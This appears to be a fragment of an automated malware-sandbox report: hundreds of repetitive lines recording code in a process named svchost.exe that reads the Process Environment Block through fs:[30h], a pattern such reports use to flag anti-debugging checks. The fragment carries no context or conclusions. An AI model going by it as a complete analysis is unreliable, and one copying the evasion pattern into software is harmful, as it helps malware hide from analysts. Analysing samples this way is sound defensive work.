Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D2000 mov eax, dword ptr fs:[00000030h]	5_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E016 mov eax, dword ptr fs:[00000030h]	5_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E016 mov eax, dword ptr fs:[00000030h]	5_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E016 mov eax, dword ptr fs:[00000030h]	5_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E016 mov eax, dword ptr fs:[00000030h]	5_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A020 mov eax, dword ptr fs:[00000030h]	5_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302C020 mov eax, dword ptr fs:[00000030h]	5_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C6030 mov eax, dword ptr fs:[00000030h]	5_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03032050 mov eax, dword ptr fs:[00000030h]	5_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6050 mov eax, dword ptr fs:[00000030h]	5_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305C073 mov eax, dword ptr fs:[00000030h]	5_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303208A mov eax, dword ptr fs:[00000030h]	5_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030280A0 mov eax, dword ptr fs:[00000030h]	5_2_030280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C80A8 mov eax, dword ptr fs:[00000030h]	5_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F60B8 mov eax, dword ptr fs:[00000030h]	5_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	5_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B20DE mov eax, dword ptr fs:[00000030h]	5_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	5_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030380E9 mov eax, dword ptr fs:[00000030h]	5_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B60E0 mov eax, dword ptr fs:[00000030h]	5_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	5_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030720F0 mov ecx, dword ptr fs:[00000030h]	5_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C700 mov eax, dword ptr fs:[00000030h]	5_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030710 mov eax, dword ptr fs:[00000030h]	5_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03060710 mov eax, dword ptr fs:[00000030h]	5_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C720 mov eax, dword ptr fs:[00000030h]	5_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C720 mov eax, dword ptr fs:[00000030h]	5_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306273C mov eax, dword ptr fs:[00000030h]	5_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306273C mov ecx, dword ptr fs:[00000030h]	5_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306273C mov eax, dword ptr fs:[00000030h]	5_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AC730 mov eax, dword ptr fs:[00000030h]	5_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306674D mov esi, dword ptr fs:[00000030h]	5_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306674D mov eax, dword ptr fs:[00000030h]	5_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306674D mov eax, dword ptr fs:[00000030h]	5_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030750 mov eax, dword ptr fs:[00000030h]	5_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BE75D mov eax, dword ptr fs:[00000030h]	5_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072750 mov eax, dword ptr fs:[00000030h]	5_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072750 mov eax, dword ptr fs:[00000030h]	5_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B4755 mov eax, dword ptr fs:[00000030h]	5_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038770 mov eax, dword ptr fs:[00000030h]	5_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040770 mov eax, dword ptr fs:[00000030h]	5_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D678E mov eax, dword ptr fs:[00000030h]	5_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030307AF mov eax, dword ptr fs:[00000030h]	5_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E47A0 mov eax, dword ptr fs:[00000030h]	5_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	5_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B07C3 mov eax, dword ptr fs:[00000030h]	5_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030527ED mov eax, dword ptr fs:[00000030h]	5_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030527ED mov eax, dword ptr fs:[00000030h]	5_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030527ED mov eax, dword ptr fs:[00000030h]	5_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	5_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030347FB mov eax, dword ptr fs:[00000030h]	5_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030347FB mov eax, dword ptr fs:[00000030h]	5_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE609 mov eax, dword ptr fs:[00000030h]	5_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304260B mov eax, dword ptr fs:[00000030h]	5_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03072619 mov eax, dword ptr fs:[00000030h]	5_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304E627 mov eax, dword ptr fs:[00000030h]	5_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03066620 mov eax, dword ptr fs:[00000030h]	5_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03068620 mov eax, dword ptr fs:[00000030h]	5_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0303262C mov eax, dword ptr fs:[00000030h]	5_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0304C640 mov eax, dword ptr fs:[00000030h]	5_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F866E mov eax, dword ptr fs:[00000030h]	5_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F866E mov eax, dword ptr fs:[00000030h]	5_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A660 mov eax, dword ptr fs:[00000030h]	5_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A660 mov eax, dword ptr fs:[00000030h]	5_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03062674 mov eax, dword ptr fs:[00000030h]	5_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03034690 mov eax, dword ptr fs:[00000030h]	5_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03034690 mov eax, dword ptr fs:[00000030h]	5_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	5_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030666B0 mov eax, dword ptr fs:[00000030h]	5_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	5_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	5_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	5_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B06F1 mov eax, dword ptr fs:[00000030h]	5_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B06F1 mov eax, dword ptr fs:[00000030h]	5_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C6500 mov eax, dword ptr fs:[00000030h]	5_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104500 mov eax, dword ptr fs:[00000030h]	5_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040535 mov eax, dword ptr fs:[00000030h]	5_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E53E mov eax, dword ptr fs:[00000030h]	5_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E53E mov eax, dword ptr fs:[00000030h]	5_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E53E mov eax, dword ptr fs:[00000030h]	5_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E53E mov eax, dword ptr fs:[00000030h]	5_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E53E mov eax, dword ptr fs:[00000030h]	5_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038550 mov eax, dword ptr fs:[00000030h]	5_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038550 mov eax, dword ptr fs:[00000030h]	5_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306656A mov eax, dword ptr fs:[00000030h]	5_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306656A mov eax, dword ptr fs:[00000030h]	5_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306656A mov eax, dword ptr fs:[00000030h]	5_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03032582 mov eax, dword ptr fs:[00000030h]	5_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03032582 mov ecx, dword ptr fs:[00000030h]	5_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03064588 mov eax, dword ptr fs:[00000030h]	5_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E59C mov eax, dword ptr fs:[00000030h]	5_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B05A7 mov eax, dword ptr fs:[00000030h]	5_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B05A7 mov eax, dword ptr fs:[00000030h]	5_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B05A7 mov eax, dword ptr fs:[00000030h]	5_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030545B1 mov eax, dword ptr fs:[00000030h]	5_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030545B1 mov eax, dword ptr fs:[00000030h]	5_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E5CF mov eax, dword ptr fs:[00000030h]	5_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E5CF mov eax, dword ptr fs:[00000030h]	5_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030365D0 mov eax, dword ptr fs:[00000030h]	5_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	5_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	5_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030325E0 mov eax, dword ptr fs:[00000030h]	5_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C5ED mov eax, dword ptr fs:[00000030h]	5_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306C5ED mov eax, dword ptr fs:[00000030h]	5_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03068402 mov eax, dword ptr fs:[00000030h]	5_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03068402 mov eax, dword ptr fs:[00000030h]	5_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03068402 mov eax, dword ptr fs:[00000030h]	5_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E420 mov eax, dword ptr fs:[00000030h]	5_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E420 mov eax, dword ptr fs:[00000030h]	5_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302E420 mov eax, dword ptr fs:[00000030h]	5_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302C427 mov eax, dword ptr fs:[00000030h]	5_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030B6420 mov eax, dword ptr fs:[00000030h]	5_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306A430 mov eax, dword ptr fs:[00000030h]	5_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0306E443 mov eax, dword ptr fs:[00000030h]	5_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EA456 mov eax, dword ptr fs:[00000030h]	5_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302645D mov eax, dword ptr fs:[00000030h]	5_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305245A mov eax, dword ptr fs:[00000030h]	5_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BC460 mov ecx, dword ptr fs:[00000030h]	5_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305A470 mov eax, dword ptr fs:[00000030h]	5_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305A470 mov eax, dword ptr fs:[00000030h]	5_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305A470 mov eax, dword ptr fs:[00000030h]	5_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030EA49A mov eax, dword ptr fs:[00000030h]	5_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030364AB mov eax, dword ptr fs:[00000030h]	5_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030644B0 mov ecx, dword ptr fs:[00000030h]	5_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	5_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030304E5 mov ecx, dword ptr fs:[00000030h]	5_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03104B00 mov eax, dword ptr fs:[00000030h]	5_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030AEB1D mov eax, dword ptr fs:[00000030h]	5_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305EB20 mov eax, dword ptr fs:[00000030h]	5_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305EB20 mov eax, dword ptr fs:[00000030h]	5_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F8B28 mov eax, dword ptr fs:[00000030h]	5_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030F8B28 mov eax, dword ptr fs:[00000030h]	5_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E4B4B mov eax, dword ptr fs:[00000030h]	5_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E4B4B mov eax, dword ptr fs:[00000030h]	5_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03102B57 mov eax, dword ptr fs:[00000030h]	5_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03102B57 mov eax, dword ptr fs:[00000030h]	5_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03102B57 mov eax, dword ptr fs:[00000030h]	5_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03102B57 mov eax, dword ptr fs:[00000030h]	5_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C6B40 mov eax, dword ptr fs:[00000030h]	5_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030C6B40 mov eax, dword ptr fs:[00000030h]	5_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030FAB40 mov eax, dword ptr fs:[00000030h]	5_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030D8B42 mov eax, dword ptr fs:[00000030h]	5_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03028B50 mov eax, dword ptr fs:[00000030h]	5_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DEB50 mov eax, dword ptr fs:[00000030h]	5_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0302CB7E mov eax, dword ptr fs:[00000030h]	5_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040BBE mov eax, dword ptr fs:[00000030h]	5_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03040BBE mov eax, dword ptr fs:[00000030h]	5_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	5_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03050BCB mov eax, dword ptr fs:[00000030h]	5_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03050BCB mov eax, dword ptr fs:[00000030h]	5_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03050BCB mov eax, dword ptr fs:[00000030h]	5_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030BCD mov eax, dword ptr fs:[00000030h]	5_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030BCD mov eax, dword ptr fs:[00000030h]	5_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03030BCD mov eax, dword ptr fs:[00000030h]	5_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	5_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038BF0 mov eax, dword ptr fs:[00000030h]	5_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038BF0 mov eax, dword ptr fs:[00000030h]	5_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03038BF0 mov eax, dword ptr fs:[00000030h]	5_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0305EBFC mov eax, dword ptr fs:[00000030h]	5_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	5_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_030BCA11 mov eax, dword ptr fs:[00000030h]	5_2_030BCA11
